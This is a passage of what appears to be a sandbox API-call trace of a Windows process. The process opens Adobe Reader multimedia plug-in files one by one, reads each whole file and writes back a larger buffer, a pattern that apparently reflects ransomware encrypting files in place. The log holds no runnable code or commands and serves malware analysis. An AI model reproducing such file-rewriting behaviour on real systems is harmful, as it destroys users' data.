hFile=0x204, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.408] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0088.408] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0088.408] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.409] CloseHandle (hObject=0x204) returned 1 [0088.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0088.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0088.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa00 [0088.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0088.411] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.411] ReleaseMutex (hMutex=0x168) returned 1 [0088.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CHS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CHS", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.CHS", lpUsedDefaultChar=0x0) returned 9 [0088.411] ReadFile (in: hFile=0x204, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.479] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0088.479] WriteFile (in: hFile=0x204, lpBuffer=0x26683c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26683c8*, lpNumberOfBytesWritten=0x359f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.479] CloseHandle (hObject=0x204) returned 1 [0088.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0088.481] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0088.481] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa00 [0088.481] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0088.481] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.481] ReleaseMutex (hMutex=0x168) returned 1 [0088.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.JPN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.JPN", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.JPN", lpUsedDefaultChar=0x0) returned 9 [0088.482] ReadFile (in: hFile=0x204, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0089.153] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0089.153] WriteFile (in: hFile=0x204, lpBuffer=0x26683c8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26683c8*, lpNumberOfBytesWritten=0x359f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0089.154] CloseHandle (hObject=0x204) returned 1 [0089.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0089.154] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0089.154] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0089.154] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0089.154] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.155] ReleaseMutex (hMutex=0x168) returned 1 [0089.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.CAT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0089.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.CAT", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.CAT", lpUsedDefaultChar=0x0) returned 10 [0089.155] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0089.266] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0089.266] WriteFile (in: hFile=0x204, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0089.267] CloseHandle (hObject=0x204) returned 1 [0089.267] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0089.267] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0089.268] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0089.268] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0089.268] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.268] ReleaseMutex (hMutex=0x168) returned 1 [0089.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.ITA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0089.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.ITA", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.ITA", lpUsedDefaultChar=0x0) returned 10 [0089.268] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0090.012] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0090.012] WriteFile (in: hFile=0x204, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0090.012] CloseHandle (hObject=0x204) returned 1 [0090.012] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0090.013] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.013] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1e00 [0090.013] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.013] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.013] ReleaseMutex (hMutex=0x168) returned 1 [0090.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.SVE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0090.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.SVE", cchWideChar=10, lpMultiByteStr=0x1f735cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.SVE", lpUsedDefaultChar=0x0) returned 10 [0090.014] ReadFile (in: hFile=0x204, lpBuffer=0x28a19a8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28a19a8*, lpNumberOfBytesRead=0x359f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0090.609] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0090.609] WriteFile (in: hFile=0x204, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x359f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0090.610] CloseHandle (hObject=0x204) returned 1 [0090.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0090.611] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.611] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa00 [0090.611] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.611] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.611] ReleaseMutex (hMutex=0x168) returned 1 [0090.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.FRA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.FRA", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.FRA", lpUsedDefaultChar=0x0) returned 13 [0090.611] ReadFile (in: hFile=0x204, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0090.739] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0090.739] WriteFile (in: hFile=0x204, lpBuffer=0x2867ab8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867ab8*, lpNumberOfBytesWritten=0x359f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0090.740] CloseHandle (hObject=0x204) returned 1 [0090.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0090.740] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.740] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa00 [0090.741] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.741] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.741] ReleaseMutex (hMutex=0x168) returned 1 [0090.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SUO", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SUO", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.SUO", lpUsedDefaultChar=0x0) returned 13 [0090.741] ReadFile (in: hFile=0x204, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0090.802] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0090.802] WriteFile (in: hFile=0x204, lpBuffer=0x1ea88b8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesWritten=0x359f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0090.802] CloseHandle (hObject=0x204) returned 1 [0090.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0090.803] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.803] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa00 [0090.803] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.803] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.803] ReleaseMutex (hMutex=0x168) returned 1 [0090.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.EUQ", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.EUQ", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.EUQ", lpUsedDefaultChar=0x0) returned 16 [0090.803] ReadFile (in: hFile=0x204, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0090.810] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0090.810] WriteFile (in: hFile=0x204, lpBuffer=0x1ea88b8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea88b8*, lpNumberOfBytesWritten=0x359f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0090.810] CloseHandle (hObject=0x204) returned 1 [0090.810] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0090.810] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.810] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa00 [0090.811] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.811] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.811] ReleaseMutex (hMutex=0x168) returned 1 [0090.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.PTB", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.PTB", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.PTB", lpUsedDefaultChar=0x0) returned 16 [0090.811] ReadFile (in: hFile=0x204, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x359f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0090.886] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0090.886] WriteFile (in: hFile=0x204, lpBuffer=0x1ea98e8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea98e8*, lpNumberOfBytesWritten=0x359f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0090.886] CloseHandle (hObject=0x204) returned 1 [0090.886] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\MCIMPP.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\mcimpp.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0090.887] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.887] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0090.887] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0090.887] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.887] ReleaseMutex (hMutex=0x168) returned 1 [0090.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.HRV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0090.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.HRV", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.HRV", lpUsedDefaultChar=0x0) returned 10 [0090.887] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0092.288] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.288] WriteFile (in: hFile=0x204, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0092.292] CloseHandle (hObject=0x204) returned 1 [0092.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\Mcimpp.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\mcimpp.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0092.293] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.293] 